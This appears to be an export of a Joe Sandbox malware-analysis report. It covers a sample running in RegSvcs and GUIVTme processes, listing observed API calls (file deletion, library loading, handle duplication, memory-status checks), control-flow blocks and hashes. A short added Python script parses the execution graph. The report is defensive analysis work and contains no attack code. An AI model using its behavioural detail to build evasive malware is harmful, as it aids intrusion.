                                                                                        • Opcode Fuzzy Hash: 25b74c97062ae38a9a8f4947e679781c067a95d18143c3e1845dc47e977bb7ac
                                                                                        • Instruction Fuzzy Hash: C1F0C2710043849AEB158E1ACC88BA6FFA8EB41234F18C45AEE080B286C2799840CAB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:114
                                                                                        Total number of Limit Nodes:11
                                                                                         Execution graph (the interactive graph is not reproduced in this export; the node and edge list below is condensed to its entry points and the API-call nodes reachable from each)
                                                                                         • Entry 5d32800: 5d32846 GetCurrentProcess, 5d32898 GetCurrentThread, 5d328d5 GetCurrentProcess, 5d32933 GetCurrentThreadId
                                                                                         • Entry 5d3f620: 5d3f6ea CallWindowProcW, 5d3de7c CallWindowProcW
                                                                                         • Entry 5d4e5e0: 5d4e626 GlobalMemoryStatusEx
                                                                                         • Entry 5d32a48: DuplicateHandle (the entry node itself)
                                                                                         • Entry e0d01c: 5d39eac CallWindowProcW, 5d3de7c CallWindowProcW
                                                                                         • Entry e50848: 5d3afb1 LoadLibraryExW, 5d3afc0 LoadLibraryExW, 5d3af60 GetModuleHandleW, 5d3cec5 CreateWindowExW, 5d3cefd CreateWindowExW (via summary nodes 5d30dc4, 5d35060, 5d35618, 5d35204 "3 API calls" and 5d3ad18 "2 API calls")
                                                                                         • Entry e57358: e5739e DeleteFileW
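The execution graph is exported as one run of "node id, address, optional label" triples interleaved with "src->dst" edges, which is hard to read but easy to parse. The following Python is an added example, not Joe Sandbox code and not part of this report: it tokenises that export (the token layout is inferred from this page, not a documented format), finds the entry points (nodes with no incoming edge) and lists the Win32 API nodes reachable from each in call order. SAMPLE_GRAPH is a constructed excerpt of this report's graph copied from the export; summary nodes labelled "N API calls" are kept as labels but not reported as APIs.

```python
"""List, per entry point, the Win32 APIs reachable in a Joe Sandbox
execution-graph export.  Added example, not Joe Sandbox code.

Assumed token layout (inferred from this report's raw export, not a
documented format): nodes are "<id> <hex address> [<label>]", edges are
"<id>-><id>", all whitespace separated on one line.  A label is either an
API name (GetCurrentProcess) or a summary such as "3 API calls"."""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]+$")

# Constructed excerpt: five entry points copied from the report's export.
SAMPLE_GRAPH = (
    "execution_graph 39055 5d32800 39056 5d32846 GetCurrentProcess "
    "39055->39056 39058 5d32891 39056->39058 39059 5d32898 GetCurrentThread "
    "39056->39059 39058->39059 39060 5d328d5 GetCurrentProcess 39059->39060 "
    "39061 5d328ce 39059->39061 39063 5d3290b 39060->39063 39061->39060 "
    "39062 5d32933 GetCurrentThreadId 39064 5d32964 39062->39064 39063->39062 "
    "39077 5d4e5e0 39078 5d4e626 GlobalMemoryStatusEx 39077->39078 "
    "39079 5d4e656 39078->39079 39080 5d32a48 DuplicateHandle 39081 5d32ade "
    "39080->39081 38973 5d316e8 38974 5d31707 38973->38974 38975 5d31728 "
    "38974->38975 38976 5d30dc4 3 API calls 38974->38976 "
    "39102 e57358 39103 e5739e DeleteFileW 39102->39103 39105 e573d7 39103->39105"
)


def _starts_node(tokens, i):
    """True if tokens[i] is an edge or begins a node ("<id> <hex address>")."""
    tok = tokens[i]
    if EDGE_RE.match(tok):
        return True
    return bool(ID_RE.match(tok)) and i + 1 < len(tokens) and bool(ADDR_RE.match(tokens[i + 1]))


def parse_graph(text):
    """Return (nodes, edges, indegree); nodes maps id -> (address, label)."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges, indeg = {}, defaultdict(list), defaultdict(int)
    i = 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:
            edges[m.group(1)].append(m.group(2))
            indeg[m.group(2)] += 1
            i += 1
            continue
        if not _starts_node(tokens, i):
            raise ValueError(f"unexpected token {tokens[i]!r} at position {i}")
        node_id, addr = tokens[i], tokens[i + 1]
        i += 2
        label = []
        # Everything up to the next node or edge is this node's label.
        # "3" in "3 API calls" is not a node id because "API" is not hex.
        while i < len(tokens) and not _starts_node(tokens, i):
            label.append(tokens[i])
            i += 1
        nodes[node_id] = (addr, " ".join(label))
    return nodes, edges, indeg


def reachable_apis(text):
    """Map each entry-point address to [(address, api), ...] in DFS preorder.

    Entry points are nodes with no incoming edge.  Summary labels such as
    "3 API calls" are not API names and are skipped."""
    nodes, edges, indeg = parse_graph(text)
    result = {}
    for root, (root_addr, _) in nodes.items():
        if indeg[root]:
            continue
        seen, calls, stack = set(), [], [root]
        while stack:
            cur = stack.pop()
            if cur in seen or cur not in nodes:
                continue
            seen.add(cur)
            addr, label = nodes[cur]
            if label and not label.endswith("API calls"):
                calls.append((addr, label))
            stack.extend(reversed(edges[cur]))  # reversed keeps export order
        result[root_addr] = calls
    return result


if __name__ == "__main__":
    for root, calls in reachable_apis(SAMPLE_GRAPH).items():
        chain = " -> ".join(f"{api}@{addr}" for addr, api in calls) or "(no API nodes)"
        print(f"{root}: {chain}")
```

Run stand-alone it prints one line per entry point. For entry 5d32800 the chain is GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId, the same order the report's control-flow graph for that function shows; walking the graph this way is how to pull an API sequence out of a large export for a hunting query or a quick triage note without reading the raw edge list.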

                                                                                        Control-flow Graph

                                                                                         Basic blocks and edges (the executed/not-executed colouring of the rendered graph is not reproduced):
                                                                                         • 5d327fb-5d3288f GetCurrentProcess -> 5d32891, 5d32898
                                                                                         • 5d32891-5d32897 -> 5d32898
                                                                                         • 5d32898-5d328cc GetCurrentThread -> 5d328d5, 5d328ce
                                                                                         • 5d328d5-5d32909 GetCurrentProcess -> 5d32912, 5d3290b
                                                                                         • 5d328ce-5d328d4 -> 5d328d5
                                                                                         • 5d32912-5d3292d call 5d329d0 -> 5d32933
                                                                                         • 5d3290b-5d32911 -> 5d32912
                                                                                         • 5d32933-5d32962 GetCurrentThreadId -> 5d32964, 5d3296b
                                                                                         • 5d32964-5d3296a -> 5d3296b
                                                                                         • 5d3296b-5d329cd
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D3287E
                                                                                        • GetCurrentThread.KERNEL32 ref: 05D328BB
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D328F8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 05D32951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 79cabf5f4fe8cd343d5b3ca159e01426d24354cfb974f2bf31f8edd9dbfa1818
                                                                                        • Instruction ID: ab450340b0d6f3e62b47cdc5f09225eb27a1bed451699b531c89466433327b9b
                                                                                        • Opcode Fuzzy Hash: 79cabf5f4fe8cd343d5b3ca159e01426d24354cfb974f2bf31f8edd9dbfa1818
                                                                                        • Instruction Fuzzy Hash: D25164B4D0030ADFDB14DFAAD549B9EBBF1EF48314F20845AE419A7360DB349984CB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                         Basic blocks and edges (the executed/not-executed colouring of the rendered graph is not reproduced):
                                                                                         • 5d32800-5d3288f GetCurrentProcess -> 5d32891, 5d32898
                                                                                         • 5d32891-5d32897 -> 5d32898
                                                                                         • 5d32898-5d328cc GetCurrentThread -> 5d328d5, 5d328ce
                                                                                         • 5d328d5-5d32909 GetCurrentProcess -> 5d32912, 5d3290b
                                                                                         • 5d328ce-5d328d4 -> 5d328d5
                                                                                         • 5d32912-5d3292d call 5d329d0 -> 5d32933
                                                                                         • 5d3290b-5d32911 -> 5d32912
                                                                                         • 5d32933-5d32962 GetCurrentThreadId -> 5d32964, 5d3296b
                                                                                         • 5d32964-5d3296a -> 5d3296b
                                                                                         • 5d3296b-5d329cd
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D3287E
                                                                                        • GetCurrentThread.KERNEL32 ref: 05D328BB
                                                                                        • GetCurrentProcess.KERNEL32 ref: 05D328F8
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 05D32951
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 99c3628eeb847914ec5578330f3b8772acf7e4f170f6ace36e301df50784993f
                                                                                        • Instruction ID: 162ec1c5da9d528fecd907da289ad4805447972bc671efb5b08f06d26c82d5fe
                                                                                        • Opcode Fuzzy Hash: 99c3628eeb847914ec5578330f3b8772acf7e4f170f6ace36e301df50784993f
                                                                                        • Instruction Fuzzy Hash: E55144B4D0030ADFDB14DFAAD548B9EBBF1EF48314F20845AE419A7360DB349984CB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                         Basic blocks and edges (the executed/not-executed colouring of the rendered graph is not reproduced):
                                                                                         • e57350-e573a2 -> e573a4, e573aa
                                                                                         • e573a4-e573a7 -> e573aa
                                                                                         • e573aa-e573d5 DeleteFileW -> e573d7, e573de
                                                                                         • e573d7-e573dd -> e573de
                                                                                         • e573de-e57406
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 00E573C8
                                                                                        Strings
Memory Dump Source
• Source File: 0000000D.00000002.2881286250.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_e50000_RegSvcs.jbxd
Similarity
• API ID: DeleteFile
• String ID: n
• API String ID: 4033686569-2013832146
• Opcode ID: 4edcfdb6d231a13ceae5f45aef672e9414cfe50caf8a28b2bf10f179c36a6520
• Instruction ID: fe07eb34e34dbf48fcfb55173574498640d46826894ab479eda876e00d6f166b
• Opcode Fuzzy Hash: 4edcfdb6d231a13ceae5f45aef672e9414cfe50caf8a28b2bf10f179c36a6520
• Instruction Fuzzy Hash: 992158B1C046598FCB10CFAAD5457EEFBB0EF48320F14856AD898B7240D378A954CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 05D3AF7E
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 65e89e9871eab198669bbe4812492a8430d7dabfa96e4f8caf0121931c067ecd
• Instruction ID: a87d8088f475cb32e4dcdee3d04eaac6e3d500fa91f3ff302000e7d7309c4098
• Opcode Fuzzy Hash: 65e89e9871eab198669bbe4812492a8430d7dabfa96e4f8caf0121931c067ecd
• Instruction Fuzzy Hash: 9B811470A00B058FDB24DF29D45676ABBF1FF88304F10892AD48AD7B50DB75E949CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 25cc356e31692ee276c9de05b22ea8b8a42a74a3568d7a82c12c046bb9d6586b
• Instruction ID: 2c9986a1d1611e4a416f60953cae21c6a9804c8cf5941d3f53c0a045cca5eb2b
• Opcode Fuzzy Hash: 25cc356e31692ee276c9de05b22ea8b8a42a74a3568d7a82c12c046bb9d6586b
• Instruction Fuzzy Hash: BE51E0B1C04249EFDF15CFA9C984ADEBFB6BF48314F14816AE818AB220D7719885CF51
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 970b2c4c04b538a444272699e08bfe397a9c3845a8a3f64f3bd059e390f524da
• Instruction ID: 75ea46b43a71e9567a17fbfd93dc90c0e3ba355e39a713e25194f106137d93ea
• Opcode Fuzzy Hash: 970b2c4c04b538a444272699e08bfe397a9c3845a8a3f64f3bd059e390f524da
• Instruction Fuzzy Hash: 2D51DFB1D00349DFDB14DFA9C885ADEBFB6BF48350F64812AE419AB210D7719885CF91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05D3D022
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 02228888eddc2718b386de2ddc8de70a061ea12abc81c178112d428cbc40012c
• Instruction ID: c58bfa3faffafd8563cb1ec22f9d7ca275325b77a683928e5e732f26f13aec40
• Opcode Fuzzy Hash: 02228888eddc2718b386de2ddc8de70a061ea12abc81c178112d428cbc40012c
• Instruction Fuzzy Hash: 8B41CEB1D00309DFDB14DFA9C885ADEBBB6FF48350F64812AE819AB210D7719885CF91
Uniqueness
Uniqueness Score: -1.00%

APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 05D3F711
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: d65193facac6da4221bd57b01c6bf5f428479fafd98787dfa91969b8c4adb20f
• Instruction ID: 50ac78fb235e49b1220ba05caa590376d4e89e54b7f455f46a11c30e22e011e4
• Opcode Fuzzy Hash: d65193facac6da4221bd57b01c6bf5f428479fafd98787dfa91969b8c4adb20f
• Instruction Fuzzy Hash: 9C411BB5A0030ADFCB14DF59C449AAABBF5FF88314F24C459D559AB321D774A841CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D32ACF
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 9ec2a40b45c74b392a497bdba89da14b91b5c89551ab00db2b7fa0e05305fd3b
• Instruction ID: af88946af8bc6b661bac5c7aeabb4b64dd1c3f1c5534cc14f3d1e75a8bc829d8
• Opcode Fuzzy Hash: 9ec2a40b45c74b392a497bdba89da14b91b5c89551ab00db2b7fa0e05305fd3b
• Instruction Fuzzy Hash: 312112B5D00208DFDB10CFA9D584ADEBBF5FB08320F14801AE818A7310D378A940CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05D32ACF
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 44b1034235f1a2c82b4114da9f749977426c0714df3ab68d48aa21a99565b8c8
• Instruction ID: ffdbfb6fc23202561fbbabd8d58b7e9bfe3f5493922989a7a0a95d68fdc6350d
• Opcode Fuzzy Hash: 44b1034235f1a2c82b4114da9f749977426c0714df3ab68d48aa21a99565b8c8
• Instruction Fuzzy Hash: 6621E2B5D002099FDB10CFAAD984ADEBFF9FB48320F14801AE958A7310D374A940CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNELBASE(00000000), ref: 00E573C8
Memory Dump Source
• Source File: 0000000D.00000002.2881286250.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_e50000_RegSvcs.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: d2310ea2a499e9c7086cf8d4fab80982b8dbdc07c939b96d5d3e55455b8f54fa
• Instruction ID: 666885c5878054a18a8b33a5bd5a3b204010c7ae89d3098aa876faa832eca1e9
• Opcode Fuzzy Hash: d2310ea2a499e9c7086cf8d4fab80982b8dbdc07c939b96d5d3e55455b8f54fa
• Instruction Fuzzy Hash: 9B1133B2C0461A9BCB10CF9AD545BAEFBB4EF48320F10852AD858B7240D378A944CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05D3AFF9,00000800,00000000,00000000), ref: 05D3B1EA
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: dd8c3655155d39b6722e2f0ce9e4ac41a05a36e039bc452b52177650aed41b59
• Instruction ID: f435b6f013b4ffcd278abbf9c6720aac5c05fcb408dd495832000893564395c5
• Opcode Fuzzy Hash: dd8c3655155d39b6722e2f0ce9e4ac41a05a36e039bc452b52177650aed41b59
• Instruction Fuzzy Hash: 4C1112B69043099FDB10CF9AC844AEEFBF5EF88320F10842AE459A7210C375A945CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,05D3AFF9,00000800,00000000,00000000), ref: 05D3B1EA
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 07260fc4d83eb249e58022506384f3301d9506a9c09c8d73957b981214ba04e8
• Instruction ID: 85bfe0450f8b4193203e2940900dccb16d50f04a7cc9460c749ab76ed73b7140
• Opcode Fuzzy Hash: 07260fc4d83eb249e58022506384f3301d9506a9c09c8d73957b981214ba04e8
• Instruction Fuzzy Hash: 221123B68043098FDB10DF9AC885AEEFBF5EF88320F14842AD459A7210C375A545CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 05D4E647
Memory Dump Source
• Source File: 0000000D.00000002.2891053060.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d40000_RegSvcs.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 67894d1227410077e50103c67f8eea8708948d16fcad34d7c8d3ed895c51fd5d
• Instruction ID: 4f20986f1997d9744097c7e85fcbececbe6b638d30fe8755f5a2888e610e64a5
• Opcode Fuzzy Hash: 67894d1227410077e50103c67f8eea8708948d16fcad34d7c8d3ed895c51fd5d
• Instruction Fuzzy Hash: C01112B1C0025A9BCB10DF9AC444BDEFBF4FF48320F14812AD818A7240D378A940CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 05D3AF7E
Memory Dump Source
• Source File: 0000000D.00000002.2890949788.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5d30000_RegSvcs.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: e253d79135596c78962c549aa482c7e7b3d662f034c9ea8380753f007e7e196f
• Instruction ID: a4f05dd3dde7fa22fb34a2b1bd99830363ce0be62346358bcea029e7a59abfdc
• Opcode Fuzzy Hash: e253d79135596c78962c549aa482c7e7b3d662f034c9ea8380753f007e7e196f
• Instruction Fuzzy Hash: 4111E0B5D047498FCB10DF9AC444ADEFBF5EF88324F10842AE469A7210D379A545CFA5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2880874753.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_e0d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
• Instruction ID: 4264615849dba07012dc3fa4310b32f6292a914cf635cf810bab46e223366690
• Opcode Fuzzy Hash: 2079f5cb4115b07a3c2f98207abf117f7dd6bac0b828ce2e391c08158e038fa5
• Instruction Fuzzy Hash: C821F271608200DFDB14DF54D984B26BBA6EB84318F20C569D84E5B296C33AD887CB61
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.2880874753.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_e0d000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
• Instruction ID: a09051e606c65a65067a9dda346b4b4d7f5621bfba1858ff9f82c2c28fe02721
• Opcode Fuzzy Hash: 95ad4745f44ecc2daaf25d5fa06b8e718b2b02ee0e169172c01d469af2599ce1
• Instruction Fuzzy Hash: 8821837550D3808FC702CF24D994715BF71EB46314F28C5DAD8498F6A7C33A984ACB62
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
Similarity
• API ID:
• String ID: tP^q
• API String ID: 0-2862610199
• Opcode ID: 7c9a42a71369288b97ff948f56a8d8da2a13aa30d7f5adca4a17a326d6ac4cbd
• Instruction ID: 4da0abe97e682c9fc5c19f0c8a0fb657fa25e38d5be69dee0a93415758de2670
• Opcode Fuzzy Hash: 7c9a42a71369288b97ff948f56a8d8da2a13aa30d7f5adca4a17a326d6ac4cbd
• Instruction Fuzzy Hash: 223137747406108FCB69AF38C55881D7BE2AF8A71536608B8E406CF3B2DE35DC42CBA1
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
Similarity
• API ID:
• String ID: tP^q
• API String ID: 0-2862610199
• Opcode ID: 49ada0edce867ef050ffb557b2dcce1416bff223bc5664e04b44ef87f7d93f74
• Instruction ID: 996d1e9a12ab6136c1ec0d199ce5a959f965ef741efc96e04ac2ec5904d4335a
• Opcode Fuzzy Hash: 49ada0edce867ef050ffb557b2dcce1416bff223bc5664e04b44ef87f7d93f74
• Instruction Fuzzy Hash: 512136747406108FCB59AF38C15881D7BE2AF8AB1536508B8E506CF375DE36DC42CB91
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8bq
                                                                                        • API String ID: 0-187764589
                                                                                        • Opcode ID: a72b91f6afb1bae699fc915dcb3c1bdd469ba225925a9349f57fd95d8dc1bd4a
                                                                                        • Instruction ID: 40666704659fae9c740cfafdcd54f72e404248328dd86ab243bdfd8445069040
                                                                                        • Opcode Fuzzy Hash: a72b91f6afb1bae699fc915dcb3c1bdd469ba225925a9349f57fd95d8dc1bd4a
                                                                                        • Instruction Fuzzy Hash: 2D11B134B001045FC705EF79E550AAE7BB6EF85304F1040A9C2099B395EE749E06CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52d0b8dbaf17653e93c7f11d496a88994a609ee28f890daf65c4333e98fe4a9f
                                                                                        • Instruction ID: 70aa079c510ddf509dcdbfd49ec96dac0c0af2569a20280f04249ea18aead6fe
                                                                                        • Opcode Fuzzy Hash: 52d0b8dbaf17653e93c7f11d496a88994a609ee28f890daf65c4333e98fe4a9f
                                                                                        • Instruction Fuzzy Hash: F4227F34B00242CFD714EF35D990A6A77B2FBC4359B248929C45A8B798EF75EC42CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3d42b4b1de27bf28895c767145042351a846cc49f8530b1a851a6f3fcbf5ada
                                                                                        • Instruction ID: 5e9fbd3dddaf7900ac961af4e68cdfd01fe3539df3ac99caba8cecbcdf565d56
                                                                                        • Opcode Fuzzy Hash: b3d42b4b1de27bf28895c767145042351a846cc49f8530b1a851a6f3fcbf5ada
                                                                                        • Instruction Fuzzy Hash: CC81A335A00341CFCB16AFB5C91869ABBF2EF88310F148569D4569B764DFB1EC85CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 56e8d2b3049eb573788e9ec201bfb856052e1532960a47f03a77287f9254621b
                                                                                        • Instruction ID: 7098b1418db48371e50771d142aa1dae1e4b5ef32049aba96aaaf770c00d4c36
                                                                                        • Opcode Fuzzy Hash: 56e8d2b3049eb573788e9ec201bfb856052e1532960a47f03a77287f9254621b
                                                                                        • Instruction Fuzzy Hash: CA118276E002459FCB01DFB4D9449AEBBB1FF8920071186AAE519DB221EBB09905CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.1832133364.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_de0000_GUIVTme.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: addc55819d575e48afe740efa236e6b7ea57ce36665052836dd6eec36e438a36
                                                                                        • Instruction ID: 3153cee09505be62ae41ed3e6a6813b7754749ba3980bf16df0e63931111dfe3
                                                                                        • Opcode Fuzzy Hash: addc55819d575e48afe740efa236e6b7ea57ce36665052836dd6eec36e438a36
                                                                                        • Instruction Fuzzy Hash: 22017575E002059FCB40EFB4D9449AFFBF5FF89310710866AE51997225EB70A915CBA0
                                                                                        Uniqueness

